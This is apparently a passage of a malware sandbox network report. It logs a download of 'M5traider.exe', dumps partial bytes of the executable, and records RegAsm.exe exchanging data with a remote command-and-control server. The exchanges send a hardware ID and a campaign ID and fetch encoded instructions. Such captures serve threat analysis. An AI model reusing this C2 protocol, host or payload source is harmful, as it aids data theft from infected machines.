EKjbfGI1A1QDq%2FOUZasoV7JfQ1aluRvMaNJTn4QEcM88MIOpsawGOp0B6A%2BOtuswH3ZDYA1WLInRm1gRHfBtEnqS%2BFl62PAReCq9Ma%2Fr0ln5Qz3Kj%2Bn51V6V6693cTWiS1oTuWfeFfQKHnaD0HR7grGubgANmsvIN%2FpCehFQUeWye4C2Fch1mk9u9QQNz%2BcCQ%2BEQzhLnnYUcZ6txuTVH29pM9tUcxooY9Nfr2MEEK9zd%2BfdQJsuyu7UM68N4AaSa6d75Keav8g%3D%3D&Expires=1703697292 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bbuseruploads.s3.amazonaws.com
2023-12-27 16:57:20 UTC	543	IN	HTTP/1.1 200 OK x-amz-id-2: sFbzkBQKbgA6yKOeUsSSwDhGgNYrbDVHsX0BqEm6kuEmS+eB3/Ugmx6vwGWtKHQ8/NlWzRKcBBA= x-amz-request-id: CF16A2R3WZYW8PP4 Date: Wed, 27 Dec 2023 16:57:21 GMT Last-Modified: Mon, 18 Dec 2023 12:51:01 GMT ETag: "1713300ba962c869477e37e4b31e40af" x-amz-server-side-encryption: AES256 x-amz-version-id: CZX3PlQKZgfZ6VUBuhdBZ2FOGpA5HEt8 Content-Disposition: attachment; filename="M5traider.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 4818944 Connection: close
2023-12-27 16:57:20 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 7d 29 99 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 2a 48 00 00 5c 01 00 00 00 00 00 1e 48 48 00 00 20 00 00 00 60 48 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 49 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL})P*H\HH `H@ I@
2023-12-27 16:57:20 UTC	481	IN	Data Raw: 3e 00 02 03 28 1d 13 00 06 38 00 00 00 00 00 2a 32 02 7b aa 00 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d aa 00 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 11 00 00 11 38 03 00 00 00 11 00 2a 00 02 28 1e 13 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 3e 00 02 03 6f 99 02 00 06 38 00 00 00 00 00 2a 32 02 7b ab 00 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d ab 00 00 04 38 f3 ff ff ff 00 13 30 02 00 1b 00 00 00 14 00 00 11 00 02 6f 9c 02 00 06 13 00 38 00 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 52 38 02 00 00 00 00 2a 00 02 03 6f 9d 02 00 06 38 f1 ff ff ff 00 00 00 32 02 7b ac 00 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d ac 00 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 20 00 00 11 00 02 6f Data Ascii: >(82{86}80 8(888>o82{8J8}80o888R8o82{86}8*0 o
2023-12-27 16:57:20 UTC	16384	IN	Data Raw: ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f a9 02 00 06 38 f1 ff ff ff 00 00 00 32 02 7b af 00 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d af 00 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 1c 00 00 11 00 02 6f ac 02 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 3e 00 02 03 6f ad 02 00 06 38 00 00 00 00 00 2a 32 02 7b b0 00 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d b0 00 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 21 00 00 11 38 03 00 00 00 11 00 2a 00 02 28 20 13 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 28 21 13 00 06 38 f1 ff ff ff 00 00 00 32 02 7b b1 00 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d b1 00 00 04 38 f3 ff ff ff 00 Data Ascii: R8o82{86}80o888>o82{8J8}80 !8( 888R8(!82{8J8*}8
2023-12-27 16:57:20 UTC	1024	IN	Data Raw: 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 58 01 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1b 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 6f 50 05 00 06 13 00 38 e8 ff ff ff 11 00 2a 3e 00 02 03 6f 51 05 00 06 38 00 00 00 00 00 2a 32 02 7b 59 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 59 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 16 00 00 11 38 0d 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 02 6f 54 05 00 06 13 00 38 e8 ff ff ff 3e 00 02 03 28 6f 13 00 06 38 00 00 00 00 00 2a 32 02 7b 5a 01 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 5a 01 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 13 00 00 11 38 0d 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 02 28 70 13 00 06 13 00 38 Data Ascii: J8}X80 888oP8>oQ82{Y86}Y80 888oT8>(o82{Z8J8}Z80 8*88(p8
2023-12-27 16:57:20 UTC	15862	IN	Data Raw: 30 02 00 20 00 00 00 18 00 00 11 38 03 00 00 00 11 00 2a 00 02 6f 78 05 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f 79 05 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 63 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 63 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 14 00 00 11 38 03 00 00 00 11 00 2a 00 02 6f 7c 05 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 3e 00 02 03 28 73 13 00 06 38 00 00 00 00 00 2a 32 02 7b 64 01 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 64 01 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 13 00 00 11 38 03 00 00 00 11 00 2a 00 02 6f 80 05 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 28 74 13 00 06 38 f1 ff ff Data Ascii: 0 8ox888R8oy82{c86}c80 8o\|888>(s82{d86}d80 8o888R8(t8
2023-12-27 16:57:20 UTC	1546	IN	Data Raw: 00 00 2a 00 00 13 30 02 00 1b 00 00 00 1b 00 00 11 00 02 6f 08 08 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 3e 00 02 03 6f 09 08 00 06 38 00 00 00 00 00 2a 32 02 7b 07 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 07 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 1a 00 00 11 38 0d 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 02 28 c2 13 00 06 13 00 38 e8 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f 0d 08 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 08 02 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 08 02 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1f 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f 10 08 00 06 13 00 38 e5 ff ff ff 3e 00 02 03 6f 11 08 00 06 38 00 00 00 00 Data Ascii: 0o888>o82{86}80 888(8R8o82{8J8}80 888o8>o8
2023-12-27 16:57:20 UTC	16384	IN	Data Raw: 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 02 6f 48 08 00 06 13 00 38 e8 ff ff ff 3e 00 02 03 6f 49 08 00 06 38 00 00 00 00 00 2a 32 02 7b 17 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 17 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 13 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 6f 4c 08 00 06 13 00 38 e8 ff ff ff 11 00 2a 3e 00 02 03 28 c7 13 00 06 38 00 00 00 00 00 2a 32 02 7b 18 02 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d 18 02 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 15 00 00 11 38 0d 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 02 6f 50 08 00 06 13 00 38 e8 ff ff ff 3e 00 02 03 6f 51 08 00 06 38 00 00 00 00 00 2a 32 02 7b 19 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 19 02 00 04 Data Ascii: 88oH8>oI82{86}80 888oL8>(82{8J8}80 888oP8>oQ82{8*6}
2023-12-27 16:57:20 UTC	1024	IN	Data Raw: 00 00 00 36 02 03 7d c0 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 16 00 00 11 38 0d 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 02 6f f0 0a 00 06 13 00 38 e8 ff ff ff 3e 00 02 03 6f f1 0a 00 06 38 00 00 00 00 00 2a 32 02 7b c1 02 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d c1 02 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 1d 00 00 11 38 0d 00 00 00 38 05 00 00 00 38 00 00 00 00 11 00 2a 00 02 6f f4 0a 00 06 13 00 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f f5 0a 00 06 38 f1 ff ff ff 00 00 00 32 02 7b c2 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d c2 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 17 00 00 11 00 02 6f f8 0a 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 Data Ascii: 6}80 888o8>o82{8J8}80 888o8R8o82{86}80o888
2023-12-27 16:57:20 UTC	16384	IN	Data Raw: 19 0b 00 06 38 00 00 00 00 00 2a 32 02 7b cb 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d cb 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 16 00 00 11 38 03 00 00 00 11 00 2a 00 02 6f 1c 0b 00 06 13 00 38 00 00 00 00 38 ea ff ff ff 38 e5 ff ff ff 52 38 02 00 00 00 00 2a 00 02 03 6f 1d 0b 00 06 38 f1 ff ff ff 00 00 00 32 02 7b cc 02 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d cc 02 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 1b 00 00 00 13 00 00 11 00 02 6f 20 0b 00 06 13 00 38 03 00 00 00 11 00 2a 38 f8 ff ff ff 38 f3 ff ff ff 00 3e 00 02 03 6f 21 0b 00 06 38 00 00 00 00 00 2a 32 02 7b cd 02 00 04 38 00 00 00 00 2a 00 00 00 4a 38 01 00 00 00 2a 02 03 7d cd 02 00 04 38 f3 ff ff ff 00 13 30 02 00 20 00 00 00 20 00 00 11 38 0d 00 00 00 11 00 2a Data Ascii: 82{86}80 8o888R8o82{86}80o 888>o!82{8J8}80 8
2023-12-27 16:57:20 UTC	1024	IN	Data Raw: 38 02 00 00 00 00 2a 00 02 03 6f bd 0d 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 74 03 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 74 03 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 1d 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 6f c0 0d 00 06 13 00 38 e8 ff ff ff 11 00 2a 3e 00 02 03 28 72 14 00 06 38 00 00 00 00 00 2a 32 02 7b 75 03 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 75 03 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 1d 00 00 11 38 0a 00 00 00 38 13 00 00 00 38 0e 00 00 00 00 02 6f c4 0d 00 06 13 00 38 e8 ff ff ff 11 00 2a 52 38 02 00 00 00 00 2a 00 02 03 6f c5 0d 00 06 38 f1 ff ff ff 00 00 00 32 02 7b 76 03 00 04 38 00 00 00 00 2a 00 00 00 36 02 03 7d 76 03 00 04 38 00 00 00 00 2a 00 00 13 30 02 00 20 00 00 00 Data Ascii: 8o82{t86}t80 888o8>(r82{u86}u80 888o8R8o82{v86}v8*0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:38 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: chincenterblandwka.pw
2023-12-27 16:57:38 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2023-12-27 16:57:38 UTC	1323	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0611fls2q9r8ghl1lah3mqtrmt; expires=Sun, 21-Apr-2024 10:44:17 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:38 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dWw3vImjGAsnOB76foGm%2Fybs77Mp0JygNCdje9zHSIyOg5By9hu66v50izpxpCJCjHfHLTnTqMiu7FkLEqvRSXdo8U0qCZxNWZRYDzYFivqXcuJgCWA3aXsp6Esclvyjd6VEDyaPKIw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31a8e29e32e69-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:38 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2023-12-27 16:57:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:39 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 635 Host: chincenterblandwka.pw
2023-12-27 16:57:39 UTC	635	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 33 30 32 39 39 34 31 35 39 39 44 43 42 33 42 41 39 36 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"CRON99--LiveT
2023-12-27 16:57:42 UTC	1339	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l3cabm6lm36umdq97vvikhcjpr; expires=Sun, 21-Apr-2024 10:44:20 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:41 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=23%2BvI9TZLcY9hvdP8IP1MSqJgN8x9ixMj%2BIg5Jtct1MMQ%2BV3DQomaFHtB8rKWv1CZ%2Bau8cJQJ3MjwKau3kwQQLs4XhuYzQhrLm9%2FF1fbBGl7N%2FiglBHDS%2F%2FLO2HenBgH4cqu%2Bpvc8Vk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31a944eb34672-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:42 UTC	28	IN	Data Raw: 31 36 0d 0a 44 65 62 75 67 20 64 61 74 61 20 69 73 20 64 69 73 61 62 6c 65 64 0d 0a Data Ascii: 16Debug data is disabled
2023-12-27 16:57:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	172.67.176.11	443	564	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-27 16:57:42 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 60 Host: chincenterblandwka.pw
2023-12-27 16:57:42 UTC	60	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 52 4f 4e 39 39 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=CRON99--LiveTraffic&j=default
2023-12-27 16:57:43 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gnbl9l0d9urtr61ml5pl41u2p6; expires=Sun, 21-Apr-2024 10:44:22 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:43 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oq1StiQFOG1HzlpGJxtz0%2BoI7Vrc485Vf9%2FuQ9Q7dUD5iMAxemUJwnWiJ%2BQhFB1IOzQYyjYIs6rPtU4iZRATFoF%2FQLfGenbldf4p4mbwN376chhfJ%2F%2B005PiCiLhwv52LMHVC3vp4Ww%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31aabdc8d2e30-DFW alt-svc: h3=":443"; ma=86400
2023-12-27 16:57:43 UTC	36	IN	Data Raw: 32 64 31 63 0d 0a 78 4f 7a 65 42 4c 64 61 62 69 76 5a 6f 4d 39 53 5a 62 62 53 39 33 4f 6d 31 53 52 72 4d 46 Data Ascii: 2d1cxOzeBLdabivZoM9SZbbS93Om1SRrMF
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 4d 2b 7a 4a 6c 76 4a 75 59 53 4f 41 4b 2f 34 64 51 6b 6c 33 70 4f 43 61 2b 43 39 58 4a 52 6d 74 2f 39 55 34 62 31 42 45 6c 44 4e 68 7a 32 75 52 74 55 6b 33 63 55 44 38 37 4d 2f 69 53 58 65 41 39 50 2b 35 72 76 4e 41 54 61 6f 5a 4a 66 71 39 38 45 53 78 42 7a 48 4b 6e 68 54 52 7a 47 53 54 55 49 35 4d 7a 2b 4a 4a 64 36 46 53 62 54 67 4f 39 79 52 5a 62 79 31 31 4f 45 73 45 70 4a 43 6e 4d 63 71 66 4d 4e 52 34 70 77 57 57 6d 72 6e 4c 4a 6e 33 7a 59 4a 51 37 7a 44 71 7a 4d 4a 32 37 65 53 46 73 65 2f 53 67 4a 64 4f 31 50 75 74 57 49 73 78 6a 49 59 49 75 54 4d 2f 69 53 56 50 78 51 4a 34 34 44 74 48 77 44 43 73 37 6f 53 31 62 34 47 5a 6a 70 7a 48 75 79 35 54 77 61 62 50 6a 55 49 7a 63 7a 2b 66 37 70 51 5a 79 4c 37 78 61 46 77 58 35 62 77 6e 52 33 4b 73 6b 55 47 56 Data Ascii: M+zJlvJuYSOAK/4dQkl3pOCa+C9XJRmt/9U4b1BElDNhz2uRtUk3cUD87M/iSXeA9P+5rvNATaoZJfq98ESxBzHKnhTRzGSTUI5Mz+JJd6FSbTgO9yRZby11OEsEpJCnMcqfMNR4pwWWmrnLJn3zYJQ7zDqzMJ27eSFse/SgJdO1PutWIsxjIYIuTM/iSVPxQJ44DtHwDCs7oS1b4GZjpzHuy5TwabPjUIzcz+f7pQZyL7xaFwX5bwnR3KskUGV
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 35 54 77 53 44 66 42 6f 34 35 4d 36 30 5a 74 4d 37 41 55 69 33 78 61 59 37 44 4e 69 2f 6e 52 48 4d 75 55 4d 4b 58 44 74 64 71 66 55 49 52 49 4e 34 56 57 79 74 69 50 77 6f 75 6c 42 4f 43 2f 6d 41 37 33 4a 46 6c 76 43 53 43 59 54 76 42 45 6c 2b 4f 6c 69 34 34 45 30 72 37 44 49 59 49 75 54 4d 2f 6e 6d 62 56 32 51 4c 2b 59 44 76 63 6b 58 4e 33 2f 31 54 68 76 55 45 53 78 42 7a 48 75 37 38 41 51 54 63 4d 68 70 6a 6f 6f 36 39 5a 74 30 71 44 46 75 2f 77 61 73 2b 44 74 75 36 6d 68 44 4b 76 55 38 4f 56 54 78 61 6f 66 67 43 52 59 42 2b 57 79 44 6f 34 64 51 6b 6c 33 70 4f 43 2f 6d 41 37 33 41 41 7a 50 44 4e 55 34 53 59 52 52 39 59 63 54 50 47 75 55 38 47 78 6a 49 59 66 2b 6a 68 31 43 53 58 65 6b 34 4c 2b 64 76 43 57 45 57 57 38 74 64 54 68 76 55 45 53 56 55 39 48 50 Data Ascii: 5TwSDfBo45M60ZtM7AUi3xaY7DNi/nRHMuUMKXDtdqfUIRIN4VWytiPwoulBOC/mA73JFlvCSCYTvBEl+Oli44E0r7DIYIuTM/nmbV2QL+YDvckXN3/1ThvUESxBzHu78AQTcMhpjoo69Zt0qDFu/was+Dtu6mhDKvU8OVTxaofgCRYB+WyDo4dQkl3pOC/mA73AAzPDNU4SYRR9YcTPGuU8GxjIYf+jh1CSXek4L+dvCWEWW8tdThvUESVU9HP
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 6e 52 38 79 49 75 54 4d 2f 69 53 58 65 6b 34 4a 76 4d 37 74 61 45 57 55 76 4a 59 64 7a 4c 68 41 41 46 34 37 56 61 58 33 42 6b 43 49 65 56 39 6d 70 34 75 35 5a 39 45 30 42 6b 2b 34 77 61 49 2f 43 4e 7a 77 32 33 36 73 39 51 52 4c 45 48 4d 65 37 4c 6c 4e 51 35 77 77 41 69 4c 6d 71 36 74 74 32 7a 35 4d 4a 74 4f 41 37 33 4a 46 6c 76 4b 4b 58 36 76 66 42 45 73 51 63 78 37 73 34 6d 49 73 78 6a 49 59 49 75 54 4d 2f 69 53 56 50 77 41 4a 34 34 44 74 50 41 37 53 74 70 41 64 78 62 46 4f 44 46 6f 31 58 61 6a 39 44 6b 75 41 64 56 74 76 6f 6f 4b 79 62 4e 51 35 41 45 4b 30 79 61 68 77 53 62 76 59 31 31 4f 47 39 51 52 4c 45 48 4d 63 71 65 4e 4e 48 4d 59 77 61 32 4f 77 6d 61 78 71 6c 56 64 6b 43 2f 6d 41 37 33 4a 46 79 2f 37 36 65 59 62 31 42 45 73 51 63 30 58 42 6b 30 38 Data Ascii: nR8yIuTM/iSXek4JvM7taEWUvJYdzLhAAF47VaX3BkCIeV9mp4u5Z9E0Bk+4waI/CNzw236s9QRLEHMe7LlNQ5wwAiLmq6tt2z5MJtOA73JFlvKKX6vfBEsQcx7s4mIsxjIYIuTM/iSVPwAJ44DtPA7StpAdxbFODFo1Xaj9DkuAdVtvooKybNQ5AEK0yahwSbvY11OG9QRLEHMcqeNNHMYwa2OwmaxqlVdkC/mA73JFy/76eYb1BEsQc0XBk08
2023-12-27 16:57:43 UTC	1369	IN	Data Raw: 57 7a 6d 31 76 34 6d 31 6a 49 42 52 36 6e 47 71 7a 73 45 32 72 69 51 47 63 43 39 53 77 5a 5a 4f 31 57 6d 2b 77 4a 42 6a 48 74 63 62 71 65 49 73 47 75 56 64 6d 4d 68 2b 59 44 76 63 6b 57 57 38 74 64 52 77 36 38 47 55 52 42 78 65 37 54 32 43 31 4f 56 52 56 31 67 39 38 37 54 44 70 64 36 54 67 76 35 67 4c 4a 2b 62 4c 76 59 2f 6c 4f 47 72 69 6c 68 45 48 4d 65 37 4c 6c 50 42 73 59 77 58 57 7a 6d 31 76 34 6d 30 54 49 4d 52 4c 48 4a 6f 6a 4d 41 32 72 43 59 47 39 61 2f 52 67 6c 63 4e 31 32 69 2f 67 78 49 68 32 4a 57 5a 71 75 49 74 48 53 56 64 6d 4d 68 2b 59 44 76 63 6b 57 57 38 74 64 52 77 36 38 47 55 52 42 78 66 4b 58 33 44 6b 69 46 64 32 39 6a 71 49 43 37 